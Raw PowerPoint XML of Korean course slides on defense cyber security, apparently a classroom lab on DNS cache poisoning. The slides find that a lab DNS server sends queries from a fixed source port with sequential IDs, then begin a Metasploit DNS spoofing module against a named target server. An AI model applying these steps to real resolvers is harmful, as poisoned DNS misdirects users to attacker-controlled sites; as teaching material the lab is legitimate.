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702" r:id="rId3"/>
    <p:sldId id="703" r:id="rId4"/>
    <p:sldId id="707" r:id="rId5"/>
    <p:sldId id="701" r:id="rId6"/>
    <p:sldId id="633" r:id="rId7"/>
    <p:sldId id="634" r:id="rId8"/>
    <p:sldId id="708" r:id="rId9"/>
    <p:sldId id="704" r:id="rId10"/>
    <p:sldId id="705" r:id="rId11"/>
    <p:sldId id="706" r:id="rId12"/>
    <p:sldId id="710" r:id="rId13"/>
    <p:sldId id="711" r:id="rId14"/>
    <p:sldId id="712" r:id="rId15"/>
    <p:sldId id="709" r:id="rId16"/>
    <p:sldId id="713" r:id="rId17"/>
    <p:sldId id="729" r:id="rId18"/>
    <p:sldId id="728" r:id="rId19"/>
    <p:sldId id="731" r:id="rId20"/>
    <p:sldId id="727" r:id="rId21"/>
    <p:sldId id="730" r:id="rId22"/>
    <p:sldId id="732" r:id="rId23"/>
    <p:sldId id="733" r:id="rId24"/>
    <p:sldId id="744" r:id="rId25"/>
    <p:sldId id="742" r:id="rId26"/>
    <p:sldId id="745" r:id="rId27"/>
    <p:sldId id="746" r:id="rId28"/>
    <p:sldId id="743" r:id="rId29"/>
    <p:sldId id="749" r:id="rId30"/>
    <p:sldId id="748" r:id="rId31"/>
    <p:sldId id="747" r:id="rId32"/>
    <p:sldId id="750" r:id="rId33"/>
    <p:sldId id="734" r:id="rId34"/>
    <p:sldId id="737" r:id="rId35"/>
    <p:sldId id="738" r:id="rId36"/>
    <p:sldId id="739" r:id="rId37"/>
    <p:sldId id="736" r:id="rId38"/>
    <p:sldId id="735" r:id="rId39"/>
    <p:sldId id="740" r:id="rId40"/>
    <p:sldId id="741" r:id="rId41"/>
    <p:sldId id="718" r:id="rId42"/>
    <p:sldId id="720" r:id="rId43"/>
    <p:sldId id="721" r:id="rId44"/>
    <p:sldId id="723" r:id="rId45"/>
    <p:sldId id="719" r:id="rId46"/>
    <p:sldId id="715" r:id="rId47"/>
    <p:sldId id="716" r:id="rId4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22" d="100"/>
          <a:sy n="122" d="100"/>
        </p:scale>
        <p:origin x="90" y="2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5DBDEC-A79D-47C5-99E0-3FD6189200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594A076-8BD1-4EA3-B169-8384AB6945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685CA80-3721-4BB1-A7A9-E7F8524E1C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ABF0F-865B-4269-B58F-5414DB8C73CD}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2023-12-04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2422AF1-81A0-49CA-A46D-B6CBEB78AA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1113589-FFD7-4D96-BD72-B23D49ED03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1F04D-F95E-475D-857D-A3C4A89501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67633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A6D1A3-B95F-4B14-B189-011BAA91C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3B6B9E4-86B1-4CD9-A68E-72124A620E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185E9DC-0AE2-40DC-834D-2DCC94FEB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ABF0F-865B-4269-B58F-5414DB8C73CD}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2023-12-04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D727885-8122-4169-8EFC-A00E103D7C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3D84021-B9E8-4D9B-AFA7-C77745B97B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1F04D-F95E-475D-857D-A3C4A89501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18352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0F7CA6E-7A4A-45F6-AEDC-70157B4651B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50FF036-69FB-4A31-B5E9-3224FEDDFD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AAE34C5-8F85-476A-9828-062CAAEF33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ABF0F-865B-4269-B58F-5414DB8C73CD}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2023-12-04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6DC97B4-F5B8-4951-A0E3-D9ED2B8EBE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69CDA4-05EC-4F54-8DA8-35CC1FC8F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1F04D-F95E-475D-857D-A3C4A89501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86471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2C9FE7-8298-41FD-BCB1-F645A669B1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16E8E51-5ADC-4B4C-96B8-183349796C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CED5FB7-3EAC-45AD-81E4-398BA5A6AC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ABF0F-865B-4269-B58F-5414DB8C73CD}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2023-12-04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A5A96F3-453A-4BE5-BF59-6D45CA3F12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95D90C8-4A8D-4B77-9043-C8F0C93C23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1F04D-F95E-475D-857D-A3C4A89501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6411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5B0D2A-4F13-48B2-AB98-32DCA191F5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F20FCBB-0412-4A04-9CA6-C922A0203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EEA0A71-9382-40BB-81D4-FC06E5B20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ABF0F-865B-4269-B58F-5414DB8C73CD}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2023-12-04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A0157FD-4713-416B-8F52-8EA9B7B6DE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E90C42A-4A0E-4FF4-BEEA-1285A34B4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1F04D-F95E-475D-857D-A3C4A89501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49213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650E7B-DAA4-4533-9AE1-6C8E5E860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D8D1F08-3641-4273-BEE3-7F13F9BDF2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C20D2B6-2BC5-46E5-8A91-33A0A81440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0D932EC-5FCC-456C-98F0-07A30DAE33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ABF0F-865B-4269-B58F-5414DB8C73CD}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2023-12-04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993871D-ACE0-4BE3-8C13-6B75CFE2CE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A47E8C0-959B-4AB8-AFAB-493AAF699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1F04D-F95E-475D-857D-A3C4A89501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14395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6B09ED-156F-4DBD-9FE0-88133986A7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175F316-B485-419A-9004-CAFBD65087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F1F402A-C3FC-4031-B351-2CC431E8AC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78A0498-F763-402A-B4B4-402D9DD865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7FD8CD4-1892-4E79-A45A-94834C5A65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E229613-0B83-4611-AA2A-C7064CE64A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ABF0F-865B-4269-B58F-5414DB8C73CD}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2023-12-04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39E172A-2E6F-4C46-9CF7-DEC5E2424D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5BA67E6-9CC5-4C87-814A-6EFBA7F588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1F04D-F95E-475D-857D-A3C4A89501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25730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160BF2-5D05-4E0B-8C31-85F14F3A5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A3F3141-8C22-44E7-A5AC-54EC0601FE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ABF0F-865B-4269-B58F-5414DB8C73CD}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2023-12-04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2D8C315-B3D1-49F9-B914-5F283129E9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373583A-4D53-4317-BD78-EFD90967F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1F04D-F95E-475D-857D-A3C4A89501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84669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5FE8425-50E9-4AC0-9858-DCB0EC1489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ABF0F-865B-4269-B58F-5414DB8C73CD}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2023-12-04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9716B50-2AA5-4FAB-8E1F-1C37D837BA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669AA77-ACD5-4C6F-ACEB-796A89B04D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1F04D-F95E-475D-857D-A3C4A89501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69216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690CC4-BA10-4A98-AABE-235ED453F6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2C036D5-8358-4E72-A51D-8D3DFE9932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B839138-7733-40BB-A597-BC010DC4D3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35C1319-DFF4-446E-8E1C-A8928D1596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ABF0F-865B-4269-B58F-5414DB8C73CD}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2023-12-04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56F3224-68FC-4840-B3B0-E92CFC5A0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BCB853F-62C0-4172-A4D9-091D7D5E5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1F04D-F95E-475D-857D-A3C4A89501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4616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3DA27C-E09C-4A7E-ABE8-B9A8769297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6A1CE02-8C8B-43FA-831A-8391D2BA781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7CECF4F-221C-4809-8560-1583F5B615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B76FFAC-9E32-483B-86D7-151B201461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ABF0F-865B-4269-B58F-5414DB8C73CD}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2023-12-04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DFC5610-A8A0-4C63-9977-2C510D7D3D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CF6C8F8-8B77-48E8-8BFA-7607AC49B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1F04D-F95E-475D-857D-A3C4A89501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18500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384E89C-DC81-44F2-BD3F-9267A7D90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69A7F6E-8005-4665-81E7-A66905D37C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99F4F53-3AF4-44C8-A4B3-C57E3FA2A67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BABF0F-865B-4269-B58F-5414DB8C73CD}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2023-12-04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4DDC6D8-D8D0-438A-A027-91CA04C16F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AC6471B-F561-4197-9DCC-8489B4485B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F1F04D-F95E-475D-857D-A3C4A89501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75738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gif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5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7.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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80D6BF-4BE7-4B95-87F4-1C4559C0133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/>
              <a:t>국방 사이버 보안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7DBF306-A7A3-41EC-91E2-168031C1A5E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/>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>주차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9287250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화살표: 오른쪽 8">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36DC0363-5748-4238-A24E-3E0F461FCB92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="134367" y="97585"/>
            <a:ext cx="257755" cy="206099"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 73148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2DF244-1E45-44A0-B32E-616FEC167CD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="392122" y="368998"/>
            <a:ext cx="5616792" cy="6120000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endParaRPr lang="ko-KR" altLang="en-US" sz="10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B02FE9C-319E-4A1A-B3F6-06CCEB53FD1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183088" y="368998"/>
            <a:ext cx="5616792" cy="6120000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en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>3.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 캡처한 패킷들 중 로컬 네트워크의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서버</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(10.0.2.6)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 보낸 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>질의들</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(queries)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>을 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>www.navy.ac.kr </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>질의 패킷</a:t>
            </a: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r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>※ DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>질의의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>소스 포트는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>33333</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>임을 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>※ www.navy.ac.kr </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>질의의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xb8a1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>임을 확인</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>는 바뀔 수 있음</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>)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4C33198-2E58-4A38-8153-C72034623E33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11593737" y="6457890"/>
            <a:ext cx="678993" cy="400110"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="400110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1BD440D7-A4B6-422E-BEF0-DA734161F7A3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10675841" y="11905"/>
              <a:ext cx="464911" cy="338139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C45BEB1-A639-4FC8-BFA8-B46B8EC4E337}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10627762" y="-30288"/>
              <a:ext cx="5971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2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>L I N K</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" alt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8" name="화살표: 오른쪽 7">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70F00BAB-BC11-49E5-AFFF-32BB961D8637}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="10773860" y="150995"/>
              <a:ext cx="251325" cy="187144"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 73148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EE680142-7F58-42C6-9B8F-5CB4311B8A6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="536439" y="529780"/>
          <a:ext cx="5328158" cy="4394200"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5328158">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4154283466"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="234696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>
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>참고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4251996"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="3989959">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="175260" marR="0" indent="-17526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※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칼리 리눅스의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DNS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서버 주소를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10.10.1.14(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공격 대상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DNS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서버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로 설정하면 웹 브라우저를 통해서도 확인 가능</a:t>
                      </a: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ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="175260" marR="0" indent="-17526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ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="175260" marR="0" indent="-17526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ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="175260" marR="0" indent="-17526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ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="175260" marR="0" indent="-17526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ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="175260" marR="0" indent="-17526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ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="175260" marR="0" indent="-17526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ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="175260" marR="0" indent="-17526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ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="175260" marR="0" indent="-17526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ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="175260" marR="0" indent="-17526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ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="175260" marR="0" indent="-17526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ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="175260" marR="0" indent="-17526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ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="175260" marR="0" indent="-17526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ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="175260" marR="0" indent="-17526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ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="175260" marR="0" indent="-17526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ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="175260" marR="0" indent="-17526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3276630"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9218" name="_x199974960">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{037F0F4E-FE9F-4E9A-9A9F-26FD274689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499" y="1426246"/>
            <a:ext cx="4062413" cy="1530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7" name="_x199978400">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D1A59FE-E102-42CE-BDF0-606AA97182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9311" y="3107644"/>
            <a:ext cx="4062413" cy="1665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_x197188112">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3C2799A-7CC5-4CAF-8175-B8D374BC7A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4886" y="1132703"/>
            <a:ext cx="5400675" cy="1887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5727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화살표: 오른쪽 8">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36DC0363-5748-4238-A24E-3E0F461FCB92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="134367" y="97585"/>
            <a:ext cx="257755" cy="206099"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 73148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2DF244-1E45-44A0-B32E-616FEC167CD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="392122" y="368998"/>
            <a:ext cx="5616792" cy="6120000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ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>- www.navy.mil.kr </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>질의 패킷</a:t>
            </a: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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>※ DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>질의의 소스 포트는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>33333</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>임을 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>※ www.navy.mil.kr </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>질의의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>0xb8bf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>임을 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    ➡ 로컬 네트워크 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서버가 보내는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>질의의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 순차적으로 증가</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    ➡ 로컬 네트워크 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서버가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>캐시 오염 공격에 취약함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B02FE9C-319E-4A1A-B3F6-06CCEB53FD1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183088" y="368998"/>
            <a:ext cx="5616792" cy="6120000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en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>4) DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>캐시 오염 공격을 위해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>실행</a:t>
            </a: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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>5) DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>캐시 오염 공격 모듈 사용</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> &gt; use auxiliary/spoof/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>dns</a:t>
            </a:r>
